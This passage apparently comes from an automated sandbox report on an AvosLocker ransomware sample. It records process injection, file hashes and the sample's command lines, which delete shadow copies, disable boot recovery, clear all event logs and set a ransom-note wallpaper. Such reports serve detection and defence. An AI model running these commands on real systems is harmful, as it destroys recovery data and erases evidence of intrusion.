Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4680 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe C:\Windows\SYSTEM32\cmd.exe
PID 4680 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe C:\Windows\SYSTEM32\cmd.exe
PID 4680 wrote to memory of 3416 N/A C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe C:\Windows\SYSTEM32\cmd.exe
PID 4680 wrote to memory of 3416 N/A C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe C:\Windows\SYSTEM32\cmd.exe
PID 4680 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe C:\Windows\SYSTEM32\cmd.exe
PID 4680 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe C:\Windows\SYSTEM32\cmd.exe
PID 4680 wrote to memory of 1908 N/A C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe C:\Windows\SYSTEM32\cmd.exe
PID 4680 wrote to memory of 1908 N/A C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe C:\Windows\SYSTEM32\cmd.exe
PID 4680 wrote to memory of 4772 N/A C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe C:\Windows\SYSTEM32\cmd.exe
PID 4680 wrote to memory of 4772 N/A C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe C:\Windows\SYSTEM32\cmd.exe
PID 1908 wrote to memory of 3180 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 1908 wrote to memory of 3180 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 3416 wrote to memory of 34968 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 3416 wrote to memory of 34968 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2588 wrote to memory of 34976 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 2588 wrote to memory of 34976 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 4772 wrote to memory of 6392 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4772 wrote to memory of 6392 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2712 wrote to memory of 6404 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2712 wrote to memory of 6404 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4680 wrote to memory of 48624 N/A C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4680 wrote to memory of 48624 N/A C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 48624 wrote to memory of 3444 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 48624 wrote to memory of 3444 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 48624 wrote to memory of 3692 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\rundll32.exe
PID 48624 wrote to memory of 3692 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\rundll32.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe

"C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe"

C:\Windows\SYSTEM32\cmd.exe

cmd /c wmic shadowcopy delete /nointeractive

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\SYSTEM32\cmd.exe

cmd /c bcdedit /set {default} recoveryenabled No

C:\Windows\SYSTEM32\cmd.exe

cmd /c bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\SYSTEM32\cmd.exe

cmd /c powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled No

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete /nointeractive

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$a = [System.IO.File]::ReadAllText(\"F:\GET_YOUR_FILES_BACK.txt\");Add-Type -AssemblyName System.Drawing;$filename = \"$env:temp\$(Get-Random).png\";$bmp = new-object System.Drawing.Bitmap 1920,1080;$font = new-object System.Drawing.Font Consolas,10;$brushBg = [System.Drawing.Brushes]::Black;$brushFg = [System.Drawing.Brushes]::White;$format = [System.Drawing.StringFormat]::GenericDefault;$format.Alignment = [System.Drawing.StringAlignment]::Center;$format.LineAlignment = [System.Drawing.StringAlignment]::Center;$graphics = [System.Drawing.Graphics]::FromImage($bmp);$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height);$graphics.DrawString($a,$font,$brushFg,[System.Drawing.RectangleF]::FromLTRB(0, 0, 1920, 1080),$format);$graphics.Dispose();$bmp.Save($filename);reg add \"HKEY_CURRENT_USER\Control Panel\Desktop\" /v Wallpaper /t REG_SZ /d $filename /f;Start-Sleep 1;rundll32.exe user32.dll, UpdatePerUserSystemParameters, 0, $false;"

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\526292617.png /f

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" user32.dll UpdatePerUserSystemParameters 0 False

Network

Country Destination Domain Proto
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 68.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 71.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp

Files

F:\GET_YOUR_FILES_BACK.txt

MD5 e88368c43d7de561cfbedc2b648244da
SHA1 44ec9116dd8dfe89df6549f96ec18dccef15cd20
SHA256 6ab96b28dc9bc5dd0130e8eee1a8810b87b60feeff054a6a8fa509110aaaa881
SHA512 e123f63bd0ff2507634c16832d71e3be6f9e52b39df4b1bd3003035f68c1c4c5692cf3cd566cfca4247569e7fe8da0c40aea2f78b9a7797def8de8b0eeef28fd

memory/6392-17562-0x000001F51E820000-0x000001F51E842000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xiwc0d1a.0ew.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 6cf293cb4d80be23433eecf74ddb5503
SHA1 24fe4752df102c2ef492954d6b046cb5512ad408
SHA256 b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA512 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 79d3a960f51997915b243fbef8084741
SHA1 fe0e1081dd63119b4c03e528c28a3656902a3637
SHA256 0ba700c8d857fec0a2692a150be5991bcc83a129c45d395267eaee9205e6de50
SHA512 6ec9bb7dfebd8b0697996f66c29c728f0cdca1a7d0dc616d84d38c26567a3b0fbda6bb4ce29d656da35e5b10361315828f46e1438eac22ea0d9009aa6dd1ff2e